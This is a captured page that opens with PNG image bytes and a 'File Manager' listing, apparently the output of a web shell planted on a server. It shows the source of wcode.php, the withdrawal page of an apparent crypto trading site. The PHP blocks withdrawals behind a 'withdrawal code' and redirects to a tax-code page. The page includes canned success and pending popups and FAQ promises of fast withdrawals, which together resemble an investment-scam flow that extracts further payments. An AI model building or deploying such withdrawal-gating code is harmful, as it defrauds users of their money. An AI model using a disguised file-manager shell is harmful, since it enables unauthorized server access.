PNG  IHDRxsBIT|d pHYs+tEXtSoftwarewww.inkscape.org<,tEXtComment File Manager

File Manager

Path: /home/u491334613/domains/bmxctrades.com/public_html/dashscrypt/

Viewing File: wcode.php

<?php
require_once('includes/connect.php');
require_once('includes/functions.php');
 
session_start();



 

if(!isset($_SESSION['email'])){
header("location:../../../index.php");
}
if(!isset($_SESSION['am'])){
header("location:withdraw.php");
}
$not_info = Getnotificationstatus($_SESSION['email']);
$not_info = Getnotification($_SESSION['email']);
$user = GetMember1($_SESSION['email']);
$history = New_history($user['Email']);


 
 
 
$tradehis = tradehis($user['Email']);
$total = $user["Profit"] + $user["Capital"];

$btcd = GetBtc();



if(!isset($_SESSION['email'])){
header("location: https://localhost");
}
$user = GetMember1($_SESSION['email']);
$history = New_history($user['Email']);
if(isset($_POST["dep"])){
header("location: index.php?dep=dep");	
}
 
    
    
   
 

if (isset($_POST['withdraw'])) {
    // Create session variables to be used in the form to avoid retyping if an error occurs
    $un = $user['full_name'];
    $email = $user['Email'];
    $type = 'dr';

    $am = $_POST["amt"];
    $p = $user["Profit"];
    $c = $user["Capital"];
    $tc = $user["tcode"];
    $wc = $user["wcode"];

    

    if ($_POST["wc"] === $wc) {
        // JavaScript to show modal and redirect after 10 seconds
       header("location: taxc.php"); 
    } else {
        echo '<script>alert("Code Incorrect.");</script>';
    }
}

 
 
?>
<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Withdraw | Bmxctrades.com</title>
    <link rel="icon" href="admin_icon_dir/1703507568643_icon.png">
    <link rel="stylesheet" href="assets/css/root.min.css?v=2">
    <link rel="stylesheet" href="assets/css/support-widget.css?v=1">
    <link rel="stylesheet" href="assets/css/toastr.css">
</head>
<body>
 
 
 
<header class="header">
    <div class="header__wrapper">
        <div class="header__logo" onclick="location.replace('')">
            <div class="header__logo-icon">
                <img style="width: 30px; margin-bottom: -3px;" src="admin_icon_dir/1703507568643_icon.png">
            </div>
            Bmxctrades
        </div>
        <div class="header__links">
            <div class="header__links-wrapper"><a class="header__link" href="trading.php">
                Spot trading
            </a>
      

                 
              <div class="header__link header__link-tools">
                    <div class="header__link-wrapper">
                        Tools
                        <div class="header__link-arrow">
                            <svg width="11" height="8" viewbox="0 0 11 8" fill="none" xmlns="http://www.w3.org/2000/svg">
                                <path d="M1.34502 3.10642L4.95202 7.05416C5.49516 7.64861 6.37253 7.64861 6.91567 7.05416L10.5227 3.10642C11.4 2.14616 10.7733 0.5 9.53388 0.5H2.31989C1.08042 0.5 0.467644 2.14616 1.34502 3.10642Z" fill="white"></path>
                            </svg>
                        </div>
                    </div>
                    <div class="header__more">
                        <a class="header__more-link" href="market-crypto.php">
                            <div class="header__more-img">
                                <img src="assets/img/header/cap.png" alt="">
                            </div>
                            <div class="header__more-wrapper">
                                <div class="header__more-name">Market cap</div>
                                <div class="header__more-description">
                                    Most of the available crypto assets and sorts them based on the market capitalization
                                </div>
                            </div>
                        </a>
                        <a class="header__more-link" href="market-screener.php">
                            <div class="header__more-img">
                                <img src="assets/img/header/screener.png" alt="">
                            </div>
                            <div class="header__more-wrapper">
                                <div class="header__more-name">Market screener</div>
                                <div class="header__more-description">
                                    Powerful tool that allows to filter instruments based on fundamental data and various technical indicators
                                </div>
                            </div>
                        </a>
                      
                    </div>
                </div>


                
                 
 
                
                <a class="header__link" href="buy-crypto.php">
                    Buy crypto
                </a>
                <a class="header__link" href="wallet.php">Wallet:<?php echo  $user["sym"]?> <?php echo number_format($total) ?>.00</a>
                
            </div>
        </div>
        <div class="header__right">
            <div class="header__user">
                <div class="header__user-btn">
                    <div class="header__user-name"><?php echo $user["full_name"] ?></div>
                    <div class="header__user-img">
                        <picture>
                            <source srcset="assets/img/profile/<?php echo $user["img"] ?>" type="image/webp">
                            <img src="assets/img/profile/<?php echo $user["img"] ?>" alt="">
                        </picture>
                    </div>
                </div>
                <div class="header-menu__bg">
                    <div class="header-menu">
                        <div class="header-menu__overview">
                            <div class="header-menu__overview-info">
                                <div class="header-menu__overview-img">
                                    <img src="assets/img/header/wallet-overview.svg" alt="">
                                </div>
                                <div class="header-menu__overview-wrapper">
                                    <div class="header-menu__overview-title">
                                        Assets overview
                                    </div>
                                    <div class="header-menu__overview-value">
                                        <?php echo  $user["sym"]?> <span> <?php echo number_format($total)?>.00</span>  
                                    </div>
                                </div>
                            </div>
                            <div class="header-menu__overview-links">
                                <a class="header-menu__overview-link" href="deposit.php">
                                    <img src="assets/img/header/wallet-add.svg" alt="">
                                    Deposit
                                </a>
                                <a class="header-menu__overview-link" href="withdraw.php">
                                    <img src="assets/img/header/withdraw.svg" alt="">
                                    Withdraw
                                </a>
                            </div>
                        </div>
                        <div class="header-menu__links">
                            
                            
                            
                            <a class="header-menu__links-link" href="trading.php">
                                <img src="assets/img/header/wallet-menu.svg" alt="">
                                Wallet
                            </a>
                            <a class="header-menu__links-link" href="settings.php">
                                <img src="assets/img/header/settings.svg" alt="">
                                Account settings
                            </a>
                            
                            <!-- <a class="header-menu__links-link" href="promo-codes">
                                <img src="assets/img/header/codes.svg" alt="">
                                Gift codes
                            </a> -->
                           
                        </div>
                        <div class="header-menu__user">
                            <div class="header-menu__user-container">
                                <a class="header-menu__user-img" href="#">
                                    <picture>
                                        <source srcset="assets/img/profile/<?php echo $user["img"] ?>" type="image/webp">
                                        <img src="assets/img/profile/<?php echo $user["img"] ?>" alt="">
                                    </picture>
                                </a>
                                <div class="header-menu__user-wrapper">
                                    <div class="header-menu__user-nickname">Dxnte</div>
                                    <div class="header-menu__user-mail"><a href=""  ><?php echo $user["Email"] ?></a></div>
                                </div>
                            </div>
                            <div class="header-menu__user-exit" onclick="location.replace('')">
                                <img src="assets/img/header/exit.svg" alt="">
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="header__btn-mobile">
                <svg width="35" height="35" viewbox="0 0 100 100">
                    <path class="header__nav-line header__nav-line1" d="M 20,29.000046 H 80.000231 C 80.000231,29.000046 94.498839,28.817352 94.532987,66.711331 94.543142,77.980673 90.966081,81.670246 85.259173,81.668997 79.552261,81.667751 75.000211,74.999942 75.000211,74.999942 L 25.000021,25.000058"></path>
                    <path class="header__nav-line header__nav-line2" d="M 20,50 H 80"></path>
                    <path class="header__nav-line header__nav-line3" d="M 20,70.999954 H 80.000231 C 80.000231,70.999954 94.498839,71.182648 94.532987,33.288669 94.543142,22.019327 90.966081,18.329754 85.259173,18.331003 79.552261,18.332249 75.000211,25.000058 75.000211,25.000058 L 25.000021,74.999942"></path>
                </svg>
            </div>
        </div>
    </div>
    
    
 <?php  
if(isset($_GET['new'])== "new") {
    echo '<script>alert("Coming up soon");</script>';
}
?>
 
  

</header>





    
    
<main class="main transaction-history">
    
    
   <style>
        /* Modal container */
        .modal {
            display: none; /* Hidden by default */
            position: fixed; /* Stay in place */
            z-index: 1; /* Sit on top */
            left: 0;
            top: 0;
            width: 100%; /* Full width */
            height: 100%; /* Full height */
            overflow: auto; /* Enable scroll if needed */
            background-color: rgb(0,0,0); /* Fallback color */
            background-color: rgba(0,0,0,0.4); /* Black w/ opacity */
            padding-top: 60px;
        }

        /* Modal content */
        .modal-content {
            background-color: #fefefe;
            margin: 5% auto; /* 15% from the top and centered */
            padding: 20px;
            border: 1px solid #888;
            width: 80%; /* Could be more or less, depending on screen size */
        }

        /* Close button */
        .close {
            color: #aaa;
            float: right;
            font-size: 28px;
            font-weight: bold;
        }

        .close:hover,
        .close:focus {
            color: black;
            text-decoration: none;
            cursor: pointer;
        }
    </style> 
    
    <?php
    // Check if 'w' parameter is set in the URL
    if (isset($_GET['w'])) {
        // Output JavaScript to call the showModal function
        echo '<script type="text/javascript">',
             'window.onload = function() {',
             '    document.getElementById("myModal").style.display = "block";',
             '};',
             '</script>';
    }
    ?>
    
    
     <div id="myModal" class="modal">
        <!-- Modal content -->
        <div class="modal-content">
            <span class="close">&times;</span>
            <p>Withdrawal is pending awaiting approval</p>
        </div>
    </div>

    <script>
        // Get the modal
        var modal = document.getElementById("myModal");

        // Get the <span> element that closes the modal
        var span = document.getElementsByClassName("close")[0];

        // When the user clicks on <span> (x), close the modal
        span.onclick = function() {
            modal.style.display = "none";
        }

        // When the user clicks anywhere outside of the modal, close it
        window.onclick = function(event) {
            if (event.target == modal) {
                modal.style.display = "none";
            }
        }
    </script>
    
    
    
    
    <section class="top-line">
        <div class="top-line__box">
            <div class="top-line__left">
                <div class="top-line__img">
                    <svg width="59" height="45" viewbox="0 0 59 45" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <line x1="52.4746" y1="8.35617" x2="31.3562" y2="38.5254" stroke="#FFB547" stroke-width="12" stroke-linecap="round"></line>
                        <line x1="29.4746" y1="8.35617" x2="8.35616" y2="38.5254" stroke="#7044EE" stroke-width="12" stroke-linecap="round"></line>
                    </svg>
                </div>
                <div class="top-line__content">
                    <div class="top-line__title">Withdraw coins</div>
                    <div class="top-line__des">Withdraw your digital funds in few minutes</div>
                </div>
            </div>
            <div class="top-line__menu">
                <a href="deposit.php" class="top-line__menu-btn">
                    <svg width="20" height="20" viewbox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M11.8851 12.8652H7.71838" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M9.80164 10.8315V14.9982" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M10.5502 2.09828L10.5252 2.15662L8.10855 7.76495H5.73355C5.16688 7.76495 4.62521 7.88162 4.13354 8.08995L5.59188 4.60662L5.62521 4.52328L5.68355 4.38995C5.70021 4.33995 5.71688 4.28995 5.74188 4.24828C6.83355 1.72328 8.06688 1.14828 10.5502 2.09828Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M15.0419 7.93197C14.6669 7.8153 14.2669 7.7653 13.8669 7.7653H8.10852L10.5252 2.15697L10.5502 2.09863C10.6752 2.1403 10.7919 2.19863 10.9169 2.24863L12.7585 3.02363C13.7835 3.44863 14.5002 3.8903 14.9335 4.42363C15.0169 4.52363 15.0835 4.6153 15.1419 4.72363C15.2169 4.8403 15.2752 4.95697 15.3085 5.08197C15.3419 5.15697 15.3669 5.23197 15.3835 5.29863C15.6085 5.99863 15.4752 6.85697 15.0419 7.93197Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M17.935 11.8318V13.4568C17.935 13.6235 17.9266 13.7901 17.9183 13.9568C17.76 16.8651 16.135 18.3318 13.0516 18.3318H6.55164C6.35164 18.3318 6.15164 18.3151 5.95997 18.2901C3.30997 18.1151 1.8933 16.6985 1.7183 14.0485C1.6933 13.8568 1.67664 13.6568 1.67664 13.4568V11.8318C1.67664 10.1568 2.6933 8.71514 4.1433 8.09014C4.6433 7.8818 5.17664 7.76514 5.7433 7.76514H13.8766C14.285 7.76514 14.685 7.82347 15.0516 7.9318C16.71 8.44014 17.935 9.99014 17.935 11.8318Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M5.59187 4.60693L4.13354 8.09027C2.68354 8.71527 1.66687 10.1569 1.66687 11.8319V9.39027C1.66687 7.0236 3.3502 5.0486 5.59187 4.60693Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M17.9324 9.38988V11.8315C17.9324 9.99821 16.7157 8.43988 15.0491 7.93988C15.4824 6.85654 15.6074 6.00654 15.3991 5.29821C15.3824 5.22321 15.3574 5.14821 15.3241 5.08154C16.8741 5.88154 17.9324 7.52321 17.9324 9.38988Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                    </svg>
                    Deposit
                </a>
                <a href="withdraw.php" class="top-line__menu-btn top-line__menu-btn-active">
                    <svg width="22" height="20" viewbox="0 0 22 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M11.8851 12.8652H7.71838" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M10.5502 2.09828L10.5252 2.15662L8.10855 7.76495H5.73355C5.16688 7.76495 4.62521 7.88162 4.13354 8.08995L5.59188 4.60662L5.62521 4.52328L5.68355 4.38995C5.70021 4.33995 5.71688 4.28995 5.74188 4.24828C6.83355 1.72328 8.06688 1.14828 10.5502 2.09828Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M15.0419 7.93197C14.6669 7.8153 14.2669 7.7653 13.8669 7.7653H8.10852L10.5252 2.15697L10.5502 2.09863C10.6752 2.1403 10.7919 2.19863 10.9169 2.24863L12.7585 3.02363C13.7835 3.44863 14.5002 3.8903 14.9335 4.42363C15.0169 4.52363 15.0835 4.6153 15.1419 4.72363C15.2169 4.8403 15.2752 4.95697 15.3085 5.08197C15.3419 5.15697 15.3669 5.23197 15.3835 5.29863C15.6085 5.99863 15.4752 6.85697 15.0419 7.93197Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M17.935 11.8318V13.4568C17.935 13.6235 17.9266 13.7901 17.9183 13.9568C17.76 16.8651 16.135 18.3318 13.0516 18.3318H6.55164C6.35164 18.3318 6.15164 18.3151 5.95997 18.2901C3.30997 18.1151 1.8933 16.6985 1.7183 14.0485C1.6933 13.8568 1.67664 13.6568 1.67664 13.4568V11.8318C1.67664 10.1568 2.6933 8.71514 4.1433 8.09014C4.6433 7.8818 5.17664 7.76514 5.7433 7.76514H13.8766C14.285 7.76514 14.685 7.82347 15.0516 7.9318C16.71 8.44014 17.935 9.99014 17.935 11.8318Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M5.59187 4.60693L4.13354 8.09027C2.68354 8.71527 1.66687 10.1569 1.66687 11.8319V9.39027C1.66687 7.0236 3.3502 5.0486 5.59187 4.60693Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M17.9324 9.38988V11.8315C17.9324 9.99821 16.7157 8.43988 15.0491 7.93988C15.4824 6.85654 15.6074 6.00654 15.3991 5.29821C15.3824 5.22321 15.3574 5.14821 15.3241 5.08154C16.8741 5.88154 17.9324 7.52321 17.9324 9.38988Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                    </svg>
                    Withdraw
                </a>
                <a href="transfer.php" class="top-line__menu-btn">
                    <svg width="22" height="20" viewbox="0 0 22 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M7.5002 18.3332H12.5002C16.6669 18.3332 18.3335 16.6665 18.3335 12.4998V7.49984C18.3335 3.33317 16.6669 1.6665 12.5002 1.6665H7.5002C3.33354 1.6665 1.66687 3.33317 1.66687 7.49984V12.4998C1.66687 16.6665 3.33354 18.3332 7.5002 18.3332Z" stroke="white" stroke-width="1.5" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M14.292 11.5166L11.7587 14.0499" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M5.70862 11.5166H14.292" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M5.70862 8.48353L8.24195 5.9502" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M14.292 8.4834H5.70862" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                    </svg>
                    Transfer Coin
                </a>
                <a href="transactions.php" class="top-line__menu-btn">
                    <svg width="21" height="20" viewbox="0 0 21 20" fill="none" xmlns="http://www.w3.org/2000/svg">
                        <path d="M18.0002 5.83317V14.1665C18.0002 16.6665 16.7502 18.3332 13.8336 18.3332H7.16691C4.25024 18.3332 3.00024 16.6665 3.00024 14.1665V5.83317C3.00024 3.33317 4.25024 1.6665 7.16691 1.6665H13.8336C16.7502 1.6665 18.0002 3.33317 18.0002 5.83317Z" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M12.5836 3.75V5.41667C12.5836 6.33333 13.3336 7.08333 14.2502 7.08333H15.9169" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M7.16687 10.8335H10.5002" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                        <path d="M7.16687 14.1665H13.8335" stroke="white" stroke-width="1.5" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"></path>
                    </svg>
                    History
                </a>
                
            </div>
        </div>
    </section>
    <div class="main__box">
        <section class="form-coins withdraw">
          
            
            <div class="form-coins__container">
                
                
                
                
                
                
                
    <style>
    body {
        font-family: Arial, sans-serif;
    }
    
    .form-container {
        width: 100%;
        max-width: 500px;
        margin: 0 auto;
        padding: 20px;
        background-color: #f9f9f9;
        border-radius: 8px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.1);
        width: 100%;
        min-width: 100% !important;
        
    }
    
    .form-group {
        margin-bottom: 20px;
    }
    
    label {
        display: block;
        font-weight: bold;
        margin-bottom: 5px;
    }
    
    select {
        width: 100%;
        padding: 10px;
        font-size: 16px;
        border-radius: 5px;
        border: 1px solid #ccc;
    }
    input {
        width: 100%;
        padding: 10px;
        font-size: 16px;
        border-radius: 5px;
        border: 1px solid #ccc;
    }
    
    button {
        padding: 10px 20px;
        font-size: 16px;
        background-color: #007bff;
        color: #fff;
        border: none;
        border-radius: 5px;
        cursor: pointer;
    }
    
    button:hover {
        background-color: #0056b3;
    }
    
    
    
    .form-group {
    margin-bottom: 15px;
  }

  .padded-select {
    padding: 6px 12px;
  }

  .paymentForm {
    margin-top: 15px;
  }

  #bankForm,
  #paypalForm,
  #bitcoinForm,
  #ethereumForm {
    display: none;
  }
 
</style>             
                
                
                
          <div class="form-coins__left" style=" width: 100%;"> 
                   
                <center> <div class="important-information__title" >Insert Withdrawal Code To Complete Withdraw</div>
                </center>
                    <div class="form-container">
    
     
 
  <form method="POST" action="wcode.php" enctype="multipart/form-data">
    
     
    

    
    
    
   
    
    <div class="form-group row">
      <label for="amount" class="col-12 col-form-label">
        <span class="col-12 col-form-label prefix">Withdrawal Code</span>
      </label>
      <div class="col-12">
        <input class="form-control" inputmode="decimal" type="number"  step="any" name="wc" required="">
        <span style="color:crimson"></span>
      </div>
    </div>
    
 

    <div class="form-group row">
      <div class="col-12">
        <center>
          <button name="withdraw" type="submit" class="btn btn-primary btn-block important">Withdraw Now</button>
        </center>
      </div>
    </div>
  </form>
</div>
 
<script>
  function showPaymentForm() {
    var paymentMethod = document.getElementById("paymentMethod").value;
    var bankForm = document.getElementById("bankForm");
    var paypalForm = document.getElementById("paypalForm");
    var bitcoinForm = document.getElementById("bitcoinForm");
    var ethereumForm = document.getElementById("ethereumForm");

    // Hide all forms
    bankForm.style.display = "none";
    paypalForm.style.display = "none";
    bitcoinForm.style.display = "none";
    ethereumForm.style.display = "none";

    // Show the selected form
    if (paymentMethod === "bank") {
      bankForm.style.display = "block";
    } else if (paymentMethod === "paypal") {
      paypalForm.style.display = "block";
    } else if (paymentMethod === "bitcoin") {
      bitcoinForm.style.display = "block";
    } else if (paymentMethod === "ethereum") {
      ethereumForm.style.display = "block";
    }
  }
</script>
                  

                    
                </div>      
                
                
                
                
                
                
                
                
                
                
                
                
                
               












                <div class="form-coins__right">
                    <div class="important-information">
                        <svg width="45" height="43" viewbox="0 0 45 43" fill="none" xmlns="http://www.w3.org/2000/svg">
                            <path d="M39.6552 1H2L44 41V4.21429V3.85714V3.5L43.6379 2.78571L43.2759 2.07143L42.9138 1.71429L42.5517 1.35714L41.8276 1H39.6552Z" fill="#68BC4A" stroke="#68BC4A"></path>
                        </svg>
                        <div class="important-information__title">Important information</div>
                        <div class="important-information__list">
                            <div class="important-information__item">Do not transfer your assets to any non <span>BTC</span>  addresses as you may not be able to retrieve the <span>BTC</span> asset after.</div>
                            <div class="important-information__item">Please check your withdrawal address carefully; once a withdrawal request is issued, it cannot be recalled.</div>
                        </div>
                    </div>
                    <div class="form-faq">
                        <div class="form-faq__block">
                            <div class="form-faq__question">When does Bmxctrades process withdrawal requests?</div>
                            <div class="form-faq__answer">
                                Instant withdrawal may take 5 to 30 min to process. However,
                                please note that in the event of high network congestion,
                                withdrawals may take longer time.
                            </div>
                        </div>
                        <div class="form-faq__block">
                            <div class="form-faq__question">
                                Is withdrawal fee already included in the withdrawal amount I have indicated?
                            </div>
                            <div class="form-faq__answer">
                                No, the withdrawal fee will charged beyond the indicated withdrawal
                                amount. If traders want to withdraw all the withdrawable amount,
                                traders can click on the "All" button and system will automatically
                                input the amount after fees.
                            </div>
                        </div>
                        <div class="form-faq__block">
                            <div class="form-faq__question">Does Bmxctrades support withdrawals to a Smart Contract ETH wallet address?</div>
                            <div class="form-faq__answer">
                                No,
                                Bmxctrades
                                does not support ETH withdrawals via Smart Contracts method.
                                Instead,
                                Bmxctrades
                                only supports ETH withdrawals via Direct Transfer method.
                            </div>
                        </div>
                        <div class="form-faq__block">
                            <div class="form-faq__question">Does Bmxctrades support withdrawals to a segwit BTC wallet address?</div>
                            <div class="form-faq__answer">
                                Yes,
                                Bmxctrades
                                supports withdrawals to segwit BTC wallet addresses
                                starting with "bc1", also known as bech32 addresses.
                            </div>
                        </div>
                        <div class="form-faq__block">
                            <div class="form-faq__question">
                                Can traders fix their own withdrawal fees on
                                Bmxctrades
                                ?
                            </div>
                            <div class="form-faq__answer">
                                At the moment, no. However,
                                Bmxctrades
                                is considering enabling this
                                option for traders to determine their own withdrawal fees in the future.
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </section>
    </div>
</main>
</script>
<script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="assets/js/withdraw.min.js"></script>
<input type="hidden" value="false" id="u_verify_status">
 <?php include("footer.php") ?>
 
<input hidden value="63743.57" id="price" type="number">
<!-- END FOOTER -->
<script src="assets/js/jquery-3.4.1.min.js"></script>
<script src="assets/js/app.min.js"></script>
<script src="assets/js/toastr.js"></script>
<script src="assets/js/newnoti.js"></script>
<script src="assets/js/error-modal.js?v=4"></script>
<script>
    function closeModal(event) {
        event.preventDefault();

        $("#alert_message_modal").removeClass("withdrawal-successful-active");
    }


    $("#butafor__btn").on("click", function(e) {
        e.preventDefault();

        $("#butafor__modal").addClass("withdrawal-successful-active");
    });

    $(".butafor__btn").on("click", function(e) {
        e.preventDefault();

        $("#butafor__modal").addClass("withdrawal-successful-active");
    });

    function closeButaforModal() {
        $("#alert_message_modal").removeClass("withdrawal-successful-active");
        $("#butafor__modal").removeClass("withdrawal-successful-active");
    }

    $("#footer_subscribe").on("click", function(e) {
        e.preventDefault();
        $("#footer_subscribe").html("Subscribed!");
    })
</script>
</body>
</html>
<script>
    var active_crypto = "BTC";

    var network = 'ERC20';

    function setNetwork(name) {
        network = name;
        if (active_crypto === 'BNB') {
            var memoBlock = document.getElementById("memo_block");
            if (network === 'BEP2') {
                memoBlock.style = "";
            } else {
                memoBlock.style = "display: none";
            }
        }
    }

    function setTab(crypto) {
        $("#btn_" + active_crypto).removeClass("buttonActiveNew");
        $("#btn_" + crypto).addClass("buttonActiveNew");

        $("#tab_" + active_crypto).removeClass("deposit__content-item-active");
        $("#tab_" + crypto).addClass("deposit__content-item-active");

        active_crypto = crypto;
    }

    setTimeout(function() {
        $('main').append(`    <div class="withdrawal-popup" id="withdraw_true_confirmed_modal">
       <div class="withdrawal-popup__block">
           <div class="withdrawal-popup__top">
               <div class="withdrawal-popup__icon">
                   <svg width="86" height="82" viewBox="0 0 86 82" fill="none" xmlns="http://www.w3.org/2000/svg">
                       <path
                           d="M65.3015 12.1441C66.4663 10.7609 66.2963 8.68327 64.8246 7.63243C58.2159 2.91368 50.3313 0.248715 42.1651 0.0165582C32.9044 -0.246714 23.8275 2.63418 16.4136 8.18977C8.99977 13.7454 3.686 21.6481 1.33829 30.6102C-1.00942 39.5722 -0.252669 49.0652 3.48522 57.5421C7.22312 66.019 13.7218 72.9801 21.9222 77.291C30.1226 81.6019 39.5412 83.0084 48.6433 81.2813C57.7453 79.5542 65.9941 74.7953 72.0455 67.7802C77.3816 61.5942 80.7315 53.9754 81.7046 45.9135C81.9212 44.1182 80.502 42.5914 78.6951 42.5186C76.8882 42.4458 75.3804 43.8556 75.1365 45.6475C74.2405 52.2294 71.456 58.4377 67.0868 63.5028C62.002 69.3974 55.0707 73.3962 47.4225 74.8474C39.7742 76.2987 31.8599 75.1168 24.9693 71.4945C18.0787 67.8722 12.6181 62.0229 9.47719 54.9C6.33632 47.777 5.70044 39.8003 7.67317 32.2696C9.6459 24.739 14.1109 18.0985 20.3406 13.4303C26.5704 8.76208 34.1975 6.34133 41.979 6.56255C48.6655 6.75264 55.1273 8.88378 60.5913 12.6613C62.0788 13.6897 64.1366 13.5272 65.3015 12.1441Z"
                           fill="#4DB742"
                       ></path>
                       <path d="M81.9998 12.7979L41.9181 53.0869L23.6992 34.7737" stroke="#4DB742" stroke-width="6.66667" stroke-linecap="round" stroke-linejoin="round"></path>
                   </svg>
               </div>
               <div class="withdrawal-popup__title">
                   Withdrawal Successful
               </div>
           </div>
           <div class="withdrawal-popup__bottom">
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Status
                   </div>
                   <div class="withdrawal-popup__table-value completed">
                       Completed
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Date
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_confirmed_date">
                       1 Nov 2023, 23:59:11
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Amount
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_confirmed_amount">
                       0
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Fee
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_confirmed_fee">
                       0
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       To
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_confirmed_address">
                       0
                   </div>
               </div>

               <div class="withdrawal-popup__close" id="close_w_confirm_modal" onclick="location.reload()">
                   Close
               </div>
           </div>
       </div>
   </div>

   <div class="withdrawal-popup" id="withdraw_true_modal_new">
       <div class="withdrawal-popup__block">
           <div class="withdrawal-popup__top">
               <div class="withdrawal-popup__icon">
                   <svg width="91" height="91" viewBox="0 0 91 91" fill="none" xmlns="http://www.w3.org/2000/svg">
                       <path
                           d="M83.4168 45.5002C83.4168 66.4302 66.4302 83.4168 45.5002 83.4168C24.5702 83.4168 7.5835 66.4302 7.5835 45.5002C7.5835 24.5702 24.5702 7.5835 45.5002 7.5835C66.4302 7.5835 83.4168 24.5702 83.4168 45.5002Z"
                           stroke="#E7BD1F"
                           stroke-width="6"
                           stroke-linecap="round"
                           stroke-linejoin="round"
                       ></path>
                       <path d="M59.5672 57.5577L47.813 50.5431C45.7655 49.3298 44.0972 46.4102 44.0972 44.0214V28.4756" stroke="#E7BD1F" stroke-width="6" stroke-linecap="round" stroke-linejoin="round"></path>
                   </svg>
               </div>
               <div class="withdrawal-popup__title">
                   Withdrawal Processing
               </div>
           </div>
           <div class="withdrawal-popup__bottom">
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Status
                   </div>
                   <div class="withdrawal-popup__table-value pending">
                       Pending
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Date
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_date">
                       1 Nov 2023, 23:59:11
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Amount
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_amount">
                       0
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       Fee
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_fee">
                       0
                   </div>
               </div>
               <div class="withdrawal-popup__table">
                   <div class="withdrawal-popup__table-key">
                       To
                   </div>
                   <div class="withdrawal-popup__table-value" id="t_withdraw_address">
                       0
                   </div>
               </div>

               <div class="withdrawal-popup__close" id="close_w_true_modal" onclick="location.reload()">
                   Close
               </div>
           </div>
       </div>
   </div>`);
    }, 600);

    function resetButtons() {
        $(".buttons__01").removeClass("buttons__disabled");
        $(".buttons__01").removeClass("buttons__loading");
        $(".button__loader").remove();
    }

    function withdraw(event, crypto) {
        event.preventDefault();

        var address = $("#withdraw_address").val();
        var memo = $("#withdraw_memo").val();
        var amount2 = $("#withdraw_amount").val().replace(',', '.')
        var amount = parseFloat(amount2);

        var user_balance = parseFloat($("#available_balance").html().replace(',', '.'));

        if (address == "" || address.length < 10) {
            noti("Please enter a valid wallet address", "error");
            resetButtons();
            return;
        }
        if (amount2 == "" || amount2 == NaN || amount <= 0) {
            noti("Please enter the amount to withdraw", "error");
            resetButtons();
            return;
        }
        if (amount > user_balance) {
            noti("You don't have enough balance to withdraw", "error");
            resetButtons();
            return;
        }

        const fee = parseFloat($("#fee_amount").val());

